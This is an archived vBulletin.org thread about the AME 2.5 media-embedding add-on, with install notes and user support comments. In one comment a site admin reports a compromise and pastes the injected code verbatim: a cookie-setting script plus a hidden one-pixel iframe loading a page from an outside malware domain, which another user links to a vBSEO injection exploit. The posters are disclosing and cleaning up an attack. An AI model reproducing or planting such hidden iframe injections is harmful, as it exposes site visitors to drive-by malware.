Go Back   vb.org Archive > vBulletin Modifications > vBulletin 3.8 Modifications > vBulletin 3.8 Add-ons
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools
AME 2.5 - Media Embedding for posts, sigs, vm's, groups and blogs Details »»
AME 2.5 - Media Embedding for posts, sigs, vm's, groups and blogs
Version: 2.5.6, by The Geek The Geek is offline
Developer Last Online: Jan 2019 Show Printable Version Email this Page

Category: Major Additions - Version: 3.8.0 Rating:
Released: 01-19-2009 Last Update: 12-08-2009 Installs: 1968
DB Changes Uses Plugins Template Edits
Additional Files  
No support by the author.

From the makers of the letters O and Yea comes the hottest 'must have mod' of the season: AME 2.5 - The Return of The Hot Mama.

Thanks everyone for making AME 2.5 Mod of the Month

AME is the multi award winning modification that smartly scans new and edited posts for URLs from a customisable variety of web sites (i.e. YouTube or Amazon or about 200 others). If it finds a match, AME will 'transform' the URL into inline embedded media without your users ever having to even think about it.

It was important for me to create a system that did not need updating (and subsequent reinstalling) every time one of the sites it supported decided to change the way it displayed its media (which is all the fricken time). Therefore I built a system in which the 'definitions' for each site could be imported, exported, tweaked and shared on a whim. This way, you only have to import the definitions that you want. It also allows the vB community to get creative and share definitions that I wouldn't of thought of!

Which sites are supported?

Included in the default installation is YouTube and Amazon. At time of posting this, I believe that there are over 180 sites supported that have been created by the vBulletin community. These range from sites that stream videos to Amazon referral links to locally hosted music and video files.

Check out the 'add ons' section of this post below to see availible add-ons.

For a total list of features and an FAQ, see click here.
For a post on troubleshooting, click here.

Though not tested on any version of vBulletin lower than 3.7.4, in theory it should work on versions 3.5 and higher (just dont quote this bit!).

Big thanks goes out to all those in the community that have supported this mod. Especially Digital Jedi who gives great support on this mod and has created over 160 definitions for this system alone!


Installation/Upgrade
  • Upload the contents of the forums folder into your forums directory and import the product-ame.xml file into your product manager (if upgrading, choose 'yes' to overwrite previous installation).
  • After installation, make sure that the system is on (admincp->AME CP->Settings)
  • Then you may want to try to rebuild old URLs via the tools option.

Change Log
nJoy

Download Now

File Type: zip ame2.5.6.zip (46.6 KB, 6324 views)

Screenshots

File Type: jpg newpost.jpg (26.4 KB, 0 views)
File Type: jpg newpost_result.jpg (61.9 KB, 0 views)

Supporters / CoAuthors

Show Your Support

  • This modification may not be copied, reproduced or published elsewhere without author's permission.
6 благодарности(ей) от:
Digital Jedi, luizalmir, Neal-UK, vijayninel, vithorius, zascok

Comments
  #1402  
Old 10-30-2010, 02:39 PM
ShackMaster ShackMaster is offline
 
Join Date: Apr 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

BEWARE OF THIS PLUGIN! We believe we had a vulnerability using the AME (Auto Media Embedder) product/plugin and have removed the plugin. We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Code:
<script> function SetCookie(cookieName,cookieContent){ var cookiePath =
'/'; var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000) ; var
expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
} SetCookie("hsmsdn", "turk"); </script> <iframe
name="1" width="1" height="1"
scrolling="no" frameborder="no" marginwidth="0"
marginheight="0"
src="http://www.chekolkal.co.cc/felk.php"></iframe>

Of course we got several warnings from Google who was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URL's prior to removing the product, but it would not work. We have removed it, but now those posts have the [ame] tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and [/ame]?

Thanks!
Reply With Quote
  #1403  
Old 10-30-2010, 08:39 PM
creativepart creativepart is offline
 
Join Date: Jun 2006
Posts: 116
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?
Reply With Quote
  #1404  
Old 10-30-2010, 08:47 PM
creativepart creativepart is offline
 
Join Date: Jun 2006
Posts: 116
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I recently ran a "rebuild post cache" maintenance routine and it disabled most if not all old YouTube vid links in AME. If I click on the post's edit button and then save it puts the vid back in the post. Otherwise it's just missing.

I know there are some tools, but I'm not sure which one to run to re-apply the mod to my existing posts. And, the warnings there kind of scared me off just giving it a try to see what happens.

Could you scale that learning curve for me and let me know which tool to use and how to apply it?

PS. I'm using VB 3,7.3 and AME 2.5.6 and the stock YouTube definition and nothing else.
Reply With Quote
  #1405  
Old 10-30-2010, 09:58 PM
carsafety carsafety is offline
 
Join Date: Apr 2006
Posts: 82
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Hi-

Does anyone have a working Amazon affiliate definition? Amazon must have changed their format a while back, as my previous definition seems hit or miss lately. Thanks!
Reply With Quote
  #1406  
Old 10-30-2010, 11:24 PM
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
Senior Member
 
Join Date: Jun 2008
Location: New York
Posts: 10,610
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I'm using this but it's pretty standard I think.

Regular Expression:
Code:
http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*
Replacement:

Code:
<a href="$ameinfo[url]?tag=joesultofftop-20" target="_blank" title="$ameinfo[url]"><img src="images/misc/amazon_icon.gif" border="0" alt="$ameinfo[title]" />$ameinfo[title]</a>
Replace my affiliate code (in red) with your own.
Reply With Quote
  #1407  
Old 10-31-2010, 12:37 AM
ShackMaster ShackMaster is offline
 
Join Date: Apr 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by creativepart View Post
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?
We do have one plugin ahead of where AME would be, but it is an Admin plugin, so there may have not been access available.

Yes... we have updated vBSEO to the latest version... immediately after we first got hit.

Will it now move to the next plugin on the list? Any idea what we need to install to block it?
Reply With Quote
  #1408  
Old 10-31-2010, 02:13 PM
carsafety carsafety is offline
 
Join Date: Apr 2006
Posts: 82
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by BirdOPrey5 View Post
I'm using this but it's pretty standard I think.
Yeah it looks like that's the same one I have, but it seems to fail far more often than in the past and I haven't figured out why yet. I guess I need to take some time to look at Amazon links and understand how the replacement definitions work. Granted, I've been meaning to do that for most of the year and was hoping someone had done the work for me lol.

Thanks for taking the time to post what you had though I greatly appreciate it!
Reply With Quote
  #1409  
Old 11-01-2010, 02:01 PM
ShackMaster ShackMaster is offline
 
Join Date: Apr 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by creativepart View Post
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?
I opened a ticket with vBulletin and here is their response:

We're not aware of any vulnerability within vBulletin 3.8.6 for this however any issue with a plugin will relate specifically to their code. vBulletin just gives the code a 'hook' to attach to and allow it to run during a particular process - we do nothing specifically with a plugin's code.

Exactly what I suspected... neither party wants to accept responsibility or apparently even investigate if they have an security issue.
Reply With Quote
  #1410  
Old 11-04-2010, 03:50 PM
legatw legatw is offline
 
Join Date: Oct 2010
Posts: 8
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

This modification increases the load on the server?
Reply With Quote
  #1411  
Old 11-04-2010, 03:53 PM
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
Senior Member
 
Join Date: Jun 2008
Location: New York
Posts: 10,610
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

All mods increase the load on the server but in the scheme of things not all that much.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 03:10 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06716 seconds
  • Memory Usage 2,361KB
  • Queries Executed 29 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (3)bbcode_code
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)modsystem_post
  • (1)navbar
  • (4)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (4)pagenav_pagelinkrel
  • (11)post_thanks_box
  • (6)post_thanks_box_bit
  • (11)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (11)post_thanks_postbit_info
  • (10)postbit
  • (3)postbit_attachment
  • (11)postbit_onlinestatus
  • (11)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_attachment
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete